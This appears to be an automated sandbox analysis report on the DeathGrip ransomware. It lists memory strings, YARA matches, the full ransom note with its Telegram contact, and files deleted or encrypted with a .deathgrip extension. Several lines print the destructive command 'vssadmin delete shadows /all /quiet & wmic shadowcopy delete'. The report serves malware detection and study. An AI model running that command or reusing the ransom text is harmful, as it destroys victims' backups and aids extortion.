                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)z
                  Source: Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718035794.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                  Source: Mai.exe, 00000004.00000003.2295052810.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2374599976.000001995E373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2237855104.000001995E372000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2103277216.000001995E3C2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2281182162.000001995E3D9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2277018993.000001995F0BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2298258374.000001995F0C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2349801232.000001995F0CE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2459478257.000001995E3DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
                  Source: Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299599683.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276009216.000001995F0A0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2393139003.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/P
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                  Source: Mai.exe, 00000004.00000003.2455637329.000001995E65C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718278386.000001995E65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                  Source: Mai.exe, 00000004.00000003.2648357957.000001995E39B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2713846387.000001995E39F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                  Source: Mai.exe, 00000004.00000002.2731113524.00007FFBA4930000.00000002.00000001.01000000.0000001A.sdmp, Mai.exe, 00000004.00000002.2734983301.00007FFBA4E22000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.openssl.org/H
                  Source: Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                  Source: Mai.exe, 00000004.00000003.1508996634.000001995DCEF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510093739.000001995DD08000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2707057152.000001995D870000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510848812.000001995DD0A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510093739.000001995DCEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                  Source: Mai.exe, 00000004.00000002.2735873578.00007FFBA5248000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.python.org/psf/license/
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085048419.000001995F4BC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2129293220.000001995F4E2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722853627.000001995F4E7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085109796.000001995F4CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                  Source: Mai.exe, 00000004.00000002.2714680779.000001995E3AF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)z
                  Source: Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.co
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
                  Source: Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2264338939.000001995E474000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2301099993.000001995E478000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2716427128.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2260377437.000001995E461000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2325267932.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2265641133.000001995E477000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2570619662.000001995E4E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
                  Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
                  Source: C:\Users\user\Desktop\main.exe; Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; Window created: window name: CLIPBRDWNDCLASS

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl\read_it.txt; Dropped file: DeathGrip Ransomware Attack | t.me/DeathGripRansomware This computer is attacked by russian ransomware community of professional black hat hackers. Your every single documents / details is now under observation of those hackers. If you want to get it back then you have to pay 1000$ for it. This Attack Is Done By Team RansomVerse You Can Find Us On Telegram @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware #DeathGripMalware
                  Source: Yara match; File source: Process Memory Space: 4wx72yFLka.exe PID: 7524, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: main.exe PID: 7676, type: MEMORYSTR
                  Source: Yara match; File source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000002.1511976435.0000000002531000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: <vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp; Binary or memory string: /C yvssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: vssadmin.exe, 00000021.00000002.1772875193.00000217E8590000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Users\user\AppData\Roaming\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet vssadmin delete shadows /all /quiet Winsta0\Default
                  Source: vssadmin.exe, 00000021.00000002.1772875193.00000217E8590000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: vssadmin delete shadows /all /quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File deleted: C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsx
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.xlsx
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe; File created: C:\Users\user\Desktop\Mai.exe entropy: 7.9968743048
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\override_list.pb.gz.deathgrip entropy: 7.99962811105
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.deathgrip entropy: 7.99020183438
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\RJ443S2W\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.deathgrip entropy: 7.99973319787
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409677868939833.txt.deathgrip entropy: 7.99850920276
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json.deathgrip entropy: 7.99992412255
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.deathgrip entropy: 7.99265157954
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.deathgrip entropy: 7.99813782241
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.deathgrip entropy: 7.99979787036
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.deathgrip entropy: 7.99858030532
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log.deathgrip entropy: 7.99765929568
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.deathgrip entropy: 7.99982344648
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.deathgrip entropy: 7.99323369737
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.deathgrip entropy: 7.99119841684
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Temp\jusched.log.deathgrip entropy: 7.99502816224
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip entropy: 7.99018439162
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip entropy: 7.99045472682
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.deathgrip entropy: 7.99173810317
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Temp\msedge_installer.log.deathgrip entropy: 7.99091263003
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip entropy: 7.99699399935
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt.deathgrip entropy: 7.99928789051
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt.deathgrip entropy: 7.9998599357Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt.deathgrip entropy: 7.99944515345Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt.deathgrip entropy: 7.99546922617Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json.deathgrip entropy: 7.99878317943Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt.deathgrip entropy: 7.99962464094Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.deathgrip entropy: 7.99605726156Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt.deathgrip entropy: 7.99914693362Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt.deathgrip entropy: 7.99807190347Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{29565D0C-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.deathgrip entropy: 7.99958130331Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin.deathgrip entropy: 7.99991082537Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\uANxnX_BheDjd2-cdR8N9DEWlds[1].css.deathgrip entropy: 7.99192232165Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip entropy: 7.99745292642Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.deathgrip entropy: 7.99910960091Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip entropy: 7.99398306461Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V01.log.deathgrip entropy: 7.99968155689Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V0100009.log.deathgrip entropy: 7.99967383224Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip entropy: 7.99119668899Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.deathgrip entropy: 7.99968254024Jump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.deathgrip entropy: 7.99646020294Jump to dropped file
